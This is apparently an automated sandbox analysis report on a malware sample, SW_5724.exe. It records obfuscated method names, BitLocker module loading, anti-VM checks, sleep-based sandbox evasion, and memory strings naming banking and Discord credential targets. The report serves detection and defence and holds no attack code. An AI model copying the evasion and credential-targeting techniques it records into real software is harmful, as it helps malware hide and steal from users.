                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.csHigh entropy of concatenated method names: 'k1Gjr0Fe6X', 'bUIja85ItZ', 'MjJj49cJg8', 'PPFj2yZy99', 'GjwjZI3rEL', 'MVVj8Xf2sn', 'fZij6rr7dC', 'VDSjCSOq4I', 'c5sj5NoAva', 'upIjKYeqsR'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, fPr9Pw7VKaJ1Bmx4pY.csHigh entropy of concatenated method names: 'U0YJ2vpoF5', 'vcaJZlgNbK', 'c3hJ86AaR6', 'hcZJ61KyHN', 'BnxJfiWdZS', 'ClFJCVELv8', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, sjDG9bdytj4KvMQl4k.csHigh entropy of concatenated method names: 'g6yfEgMdYc', 'iQafIDwusb', 'xNCff6FSkP', 'QY2fBZX8OE', 'CcrfUdgG8S', 'tkCfSbY6o1', 'Dispose', 'iuekacR5xR', 'iENk4M21sT', 'RQNk2XWip9'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, Tv9Pl4XFfTOr0rs9ixU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BkyWfUQNH5', 'btUWJwNMfL', 'wgkWBVhbag', 'A3EWW4aZWU', 'EBcWUlSIs5', 'VbaW0H9UeO', 'POqWSmphp3'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, a0tXnlFT3tegeO4j49.csHigh entropy of concatenated method names: 'cIkX6imOJm', 'ybCXCtpRP9', 'HJtXKEQUrZ', 'rqCXN67q2m', 'wx7XE4OqRV', 'yDaXchpbrn', 'Tf4Y6v2Dk46ChpZiNJ', 'hRAyMvUUXExoA11wb3', 'ikDXivPnwhDq3QsaUd', 'SQyXXQodVh'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, XwL7mf4ov2kYpvnS9P.csHigh entropy of concatenated method names: 'Dispose', 'c4KXmvMQl4', 'rRHMhcykrV', 'rjbQL0WlRh', 'qktX7HU0R9', 'FP9XzibYZn', 'ProcessDialogKey', 'EYQM3QF4cg', 'RriMXXtqWl', 'EXdMMaPr9P'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, PQF4cgmHriXtqWlvXd.csHigh entropy of concatenated method names: 'pbEfPMmUbO', 'OMgfhaN27I', 'mKlfi2ZqUP', 'C8ffxdHmLY', 'KqSf1XD5Ru', 'aQ7fqOS6fL', 'VARfRG1AMf', 'CJ8fsB3BfV', 'hpsfgvTwj0', 'qhvfo01GmV'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SW_5724.exe PID: 7284, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 4F50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 5F50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 6080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: 7080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: B010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: B4A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: C4A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E rdtsc 6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4999Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1842Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 3451Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 6522Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\SW_5724.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092Thread sleep count: 3451 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092Thread sleep time: -6902000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092Thread sleep count: 6522 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092Thread sleep time: -13044000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112Thread sleep time: -49500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047C7B0 FindFirstFileW,FindNextFileW,FindClose,10_2_0047C7B0
                Source: C:\Users\user\Desktop\SW_5724.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 174EBI30.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 174EBI30.10.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 174EBI30.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 174EBI30.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: SW_5724.exe, 00000000.00000002.2079014451.0000000000C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
